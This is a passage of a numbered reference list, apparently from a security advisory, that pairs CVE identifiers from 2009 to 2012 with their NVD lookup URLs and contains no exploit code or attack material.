http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3373 [ 139 ] CVE-2009-3374 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3374 [ 140 ] CVE-2009-3375 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3375 [ 141 ] CVE-2009-3376 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3376 [ 142 ] CVE-2009-3377 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3377 [ 143 ] CVE-2009-3378 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3378 [ 144 ] CVE-2009-3379 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3379 [ 145 ] CVE-2009-3380 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3380 [ 146 ] CVE-2009-3381 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3381 [ 147 ] CVE-2009-3382 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3382 [ 148 ] CVE-2009-3383 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3383 [ 149 ] CVE-2009-3388 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3388 [ 150 ] CVE-2009-3389 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3389 [ 151 ] CVE-2009-3555 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3555 [ 152 ] CVE-2009-3978 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3978 [ 153 ] CVE-2009-3979 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3979 [ 154 ] CVE-2009-3980 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3980 [ 155 ] CVE-2009-3981 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3981 [ 156 ] CVE-2009-3982 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3982 [ 157 ] CVE-2009-3983 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3983 [ 158 ] CVE-2009-3984 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3984 [ 159 ] CVE-2009-3985 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3985 [ 160 ] CVE-2009-3986 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3986 [ 161 ] CVE-2009-3987 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3987 [ 162 ] CVE-2009-3988 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3988 [ 163 ] CVE-2010-0159 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0159 [ 164 ] CVE-2010-0160 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0160 [ 165 ] CVE-2010-0162 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0162 [ 166 ] CVE-2010-0163 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0163 [ 167 ] CVE-2010-0164 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0164 [ 168 ] CVE-2010-0165 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0165 [ 169 ] CVE-2010-0166 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0166 [ 170 ] CVE-2010-0167 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0167 [ 171 ] CVE-2010-0167 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0167 [ 172 ] CVE-2010-0168 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0168 [ 173 ] CVE-2010-0169 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0169 [ 174 ] CVE-2010-0169 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0169 [ 175 ] CVE-2010-0170 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0170 [ 176 ] CVE-2010-0171 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0171 [ 177 ] CVE-2010-0171 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0171 [ 178 ] CVE-2010-0172 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0172 [ 179 ] CVE-2010-0173 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0173 [ 180 ] CVE-2010-0174 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0174 [ 181 ] CVE-2010-0174 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0174 [ 182 ] CVE-2010-0175 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0175 [ 183 ] CVE-2010-0175 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0175 [ 184 ] CVE-2010-0176 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0176 [ 185 ] CVE-2010-0176 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0176 [ 186 ] CVE-2010-0177 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0177 [ 187 ] CVE-2010-0178 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0178 [ 188 ] CVE-2010-0179 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0179 [ 189 ] CVE-2010-0181 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0181 [ 190 ] CVE-2010-0182 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0182 [ 191 ] CVE-2010-0183 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0183 [ 192 ] CVE-2010-0220 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0220 [ 193 ] CVE-2010-0648 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0648 [ 194 ] CVE-2010-0654 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0654 [ 195 ] CVE-2010-1028 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1028 [ 196 ] CVE-2010-1121 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1121 [ 197 ] CVE-2010-1125 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1125 [ 198 ] CVE-2010-1196 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1196 [ 199 ] CVE-2010-1197 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1197 [ 200 ] CVE-2010-1198 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1198 [ 201 ] CVE-2010-1199 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1199 [ 202 ] CVE-2010-1200 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1200 [ 203 ] CVE-2010-1201 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1201 [ 204 ] CVE-2010-1202 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1202 [ 205 ] CVE-2010-1203 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1203 [ 206 ] CVE-2010-1205 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1205 [ 207 ] CVE-2010-1206 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1206 [ 208 ] CVE-2010-1207 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1207 [ 209 ] CVE-2010-1208 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1208 [ 210 ] CVE-2010-1209 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1209 [ 211 ] CVE-2010-1210 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1210 [ 212 ] CVE-2010-1211 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1211 [ 213 ] CVE-2010-1212 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1212 [ 214 ] CVE-2010-1213 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1213 [ 215 ] CVE-2010-1214 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1214 [ 216 ] CVE-2010-1215 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1215 [ 217 ] CVE-2010-1585 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1585 [ 218 ] CVE-2010-2751 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2751 [ 219 ] CVE-2010-2752 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2752 [ 220 ] CVE-2010-2753 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2753 [ 221 ] CVE-2010-2754 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2754 [ 222 ] CVE-2010-2755 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2755 [ 223 ] CVE-2010-2760 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2760 [ 224 ] CVE-2010-2762 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2762 [ 225 ] CVE-2010-2763 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2763 [ 226 ] CVE-2010-2764 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2764 [ 227 ] CVE-2010-2765 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2765 [ 228 ] CVE-2010-2766 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2766 [ 229 ] CVE-2010-2767 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2767 [ 230 ] CVE-2010-2768 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2768 [ 231 ] CVE-2010-2769 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2769 [ 232 ] CVE-2010-2770 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2770 [ 233 ] CVE-2010-3131 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3131 [ 234 ] CVE-2010-3166 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3166 [ 235 ] CVE-2010-3167 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3167 [ 236 ] CVE-2010-3168 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3168 [ 237 ] CVE-2010-3169 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3169 [ 238 ] CVE-2010-3170 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3170 [ 239 ] CVE-2010-3171 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3171 [ 240 ] CVE-2010-3173 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3173 [ 241 ] CVE-2010-3174 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3174 [ 242 ] CVE-2010-3175 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3175 [ 243 ] CVE-2010-3176 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3176 [ 244 ] CVE-2010-3177 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3177 [ 245 ] CVE-2010-3178 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3178 [ 246 ] CVE-2010-3179 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3179 [ 247 ] CVE-2010-3180 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3180 [ 248 ] CVE-2010-3182 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3182 [ 249 ] CVE-2010-3183 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3183 [ 250 ] CVE-2010-3399 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3399 [ 251 ] CVE-2010-3400 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3400 [ 252 ] CVE-2010-3765 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3765 [ 253 ] CVE-2010-3766 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3766 [ 254 ] CVE-2010-3767 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3767 [ 255 ] CVE-2010-3768 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3768 [ 256 ] CVE-2010-3769 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3769 [ 257 ] CVE-2010-3770 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3770 [ 258 ] CVE-2010-3771 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3771 [ 259 ] CVE-2010-3772 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3772 [ 260 ] CVE-2010-3773 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3773 [ 261 ] CVE-2010-3774 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3774 [ 262 ] CVE-2010-3775 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3775 [ 263 ] CVE-2010-3776 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3776 [ 264 ] CVE-2010-3777 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3777 [ 265 ] CVE-2010-3778 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3778 [ 266 ] CVE-2010-4508 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4508 [ 267 ] CVE-2010-5074 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-5074 [ 268 ] CVE-2011-0051 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0051 [ 269 ] CVE-2011-0053 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0053 [ 270 ] CVE-2011-0054 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0054 [ 271 ] CVE-2011-0055 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0055 [ 272 ] CVE-2011-0056 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0056 [ 273 ] CVE-2011-0057 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0057 [ 274 ] CVE-2011-0058 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0058 [ 275 ] CVE-2011-0059 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0059 [ 276 ] CVE-2011-0061 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0061 [ 277 ] CVE-2011-0062 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0062 [ 278 ] CVE-2011-0065 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0065 [ 279 ] CVE-2011-0066 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0066 [ 280 ] CVE-2011-0067 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0067 [ 281 ] CVE-2011-0068 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0068 [ 282 ] CVE-2011-0069 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0069 [ 283 ] CVE-2011-0070 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0070 [ 284 ] CVE-2011-0071 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0071 [ 285 ] CVE-2011-0072 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0072 [ 286 ] CVE-2011-0073 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0073 [ 287 ] CVE-2011-0074 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0074 [ 288 ] CVE-2011-0075 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0075 [ 289 ] CVE-2011-0076 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0076 [ 290 ] CVE-2011-0077 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0077 [ 291 ] CVE-2011-0078 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0078 [ 292 ] CVE-2011-0079 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0079 [ 293 ] CVE-2011-0080 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0080 [ 294 ] CVE-2011-0081 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0081 [ 295 ] CVE-2011-0082 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0082 [ 296 ] CVE-2011-0083 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0083 [ 297 ] CVE-2011-0084 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0084 [ 298 ] CVE-2011-0085 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0085 [ 299 ] CVE-2011-1187 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1187 [ 300 ] CVE-2011-1202 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1202 [ 301 ] CVE-2011-1712 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1712 [ 302 ] CVE-2011-2362 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2362 [ 303 ] CVE-2011-2363 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2363 [ 304 ] CVE-2011-2364 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2364 [ 305 ] CVE-2011-2365 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2365 [ 306 ] CVE-2011-2369 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2369 [ 307 ] CVE-2011-2370 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2370 [ 308 ] CVE-2011-2371 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2371 [ 309 ] CVE-2011-2372 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2372 [ 310 ] CVE-2011-2373 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2373 [ 311 ] CVE-2011-2374 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2374 [ 312 ] CVE-2011-2375 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2375 [ 313 ] CVE-2011-2376 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2376 [ 314 ] CVE-2011-2377 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2377 [ 315 ] CVE-2011-2378 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2378 [ 316 ] CVE-2011-2605 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2605 [ 317 ] CVE-2011-2980 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2980 [ 318 ] CVE-2011-2981 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2981 [ 319 ] CVE-2011-2982 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2982 [ 320 ] CVE-2011-2983 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2983 [ 321 ] CVE-2011-2984 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2984 [ 322 ] CVE-2011-2985 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2985 [ 323 ] CVE-2011-2986 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2986 [ 324 ] CVE-2011-2987 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2987 [ 325 ] CVE-2011-2988 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2988 [ 326 ] CVE-2011-2989 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2989 [ 327 ] CVE-2011-2990 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2990 [ 328 ] CVE-2011-2991 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2991 [ 329 ] CVE-2011-2993 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2993 [ 330 ] CVE-2011-2995 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2995 [ 331 ] CVE-2011-2996 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2996 [ 332 ] CVE-2011-2997 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2997 [ 333 ] CVE-2011-2998 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2998 [ 334 ] CVE-2011-2999 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2999 [ 335 ] CVE-2011-3000 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3000 [ 336 ] CVE-2011-3001 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3001 [ 337 ] CVE-2011-3002 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3002 [ 338 ] CVE-2011-3003 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3003 [ 339 ] CVE-2011-3004 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3004 [ 340 ] CVE-2011-3005 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3005 [ 341 ] CVE-2011-3026 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3026 [ 342 ] CVE-2011-3062 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3062 [ 343 ] CVE-2011-3232 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3232 [ 344 ] CVE-2011-3389 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3389 [ 345 ] CVE-2011-3640 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3640 [ 346 ] CVE-2011-3647 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3647 [ 347 ] CVE-2011-3648 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3648 [ 348 ] CVE-2011-3649 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3649 [ 349 ] CVE-2011-3650 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3650 [ 350 ] CVE-2011-3651 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3651 [ 351 ] CVE-2011-3652 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3652 [ 352 ] CVE-2011-3653 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3653 [ 353 ] CVE-2011-3654 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3654 [ 354 ] CVE-2011-3655 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3655 [ 355 ] CVE-2011-3658 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3658 [ 356 ] CVE-2011-3659 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3659 [ 357 ] CVE-2011-3660 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3660 [ 358 ] CVE-2011-3661 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3661 [ 359 ] CVE-2011-3663 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3663 [ 360 ] CVE-2011-3665 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3665 [ 361 ] CVE-2011-3670 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3670 [ 362 ] CVE-2011-3866 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3866 [ 363 ] CVE-2011-4688 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4688 [ 364 ] CVE-2012-0441 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0441 [ 365 ] CVE-2012-0442 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0442 [ 366 ] CVE-2012-0443 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0443 [ 367 ] CVE-2012-0444 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0444 [ 368 ] CVE-2012-0445 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0445 [ 369 ] CVE-2012-0446 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0446 [ 370 ] CVE-2012-0447 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0447 [ 371 ] CVE-2012-0449 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0449 [ 372 ] CVE-2012-0450 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0450 [ 373 ] CVE-2012-0451 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0451 [ 374 ] CVE-2012-0452 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0452 [ 375 ] CVE-2012-0455 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0455 [ 376 ] CVE-2012-0456 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0456 [ 377 ] CVE-2012-0457 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0457 [ 378 ] CVE-2012-0458 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0458 [ 379 ] CVE-2012-0459 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0459 [ 380 ] CVE-2012-0460 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0460 [ 381 ] CVE-2012-0461 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0461 [ 382 ] CVE-2012-0462 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0462 [ 383 ] CVE-2012-0463 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0463 [ 384 ] CVE-2012-0464 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0464 [ 385 ] CVE-2012-0467 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0467 [ 386 ] CVE-2012-0468 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0468 [ 387 ] CVE-2012-0469 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0469 [ 388 ] CVE-2012-0470 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0470 [ 389 ] CVE-2012-0471 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0471 [ 390 ] CVE-2012-0473 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0473 [ 391 ] CVE-2012-0474 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0474 [ 392 ] CVE-2012-0475 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0475 [ 393 ] CVE-2012-0477 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0477 [ 394 ] CVE-2012-0478 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0478 [ 395 ] CVE-2012-0479 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0479 [ 396 ] CVE-2012-1937 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1937 [ 397 ] CVE-2012-1938 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1938 [ 398 ] CVE-2012-1939 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1939 [ 399 ] CVE-2012-1940 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1940 [ 400 ] CVE-2012-1941 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1941 [ 401 ] CVE-2012-1945 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1945 [ 402 ] CVE-2012-1946 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1946 [ 403 ] CVE-2012-1947 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1947 [ 404 ] CVE-2012-1948 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1948 [ 405 ] CVE-2012-1949 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1949 [ 406 ] CVE-2012-1950 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1950 [ 407 ] CVE-2012-1951 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1951 [ 408 ] CVE-2012-1952 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1952 [ 409 ] CVE-2012-1953 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1953 [ 410 ] CVE-2012-1954 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1954 [ 411 ] CVE-2012-1955 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1955 [ 412 ] CVE-2012-1956 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1956 [ 413 ] CVE-2012-1957 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1957 [ 414 ] CVE-2012-1958 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1958 [ 415 ] CVE-2012-1959 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1959 [ 416 ] CVE-2012-1960 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1960 [ 417 ] CVE-2012-1961 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1961 [ 418 ] CVE-2012-1962 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1962 [ 419 ] CVE-2012-1963 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1963 [ 420 ] CVE-2012-1964 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1964 [ 421 ] CVE-2012-1965 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1965 [ 422 ] CVE-2012-1966 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1966 [ 423 ] CVE-2012-1967 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1967 [ 424 ] CVE-2012-1970 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1970 [ 425 ] CVE-2012-1971 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1971 [ 426 ] CVE-2012-1972 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1972 [ 427 ] CVE-2012-1973 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1973 [ 428 ] CVE-2012-1974 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1974 [ 429 ] CVE-2012-1975 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1975 [ 430 ] CVE-2012-1976 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1976 [ 431 ] CVE-2012-1994 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1994 [ 432 ] CVE-2012-3956 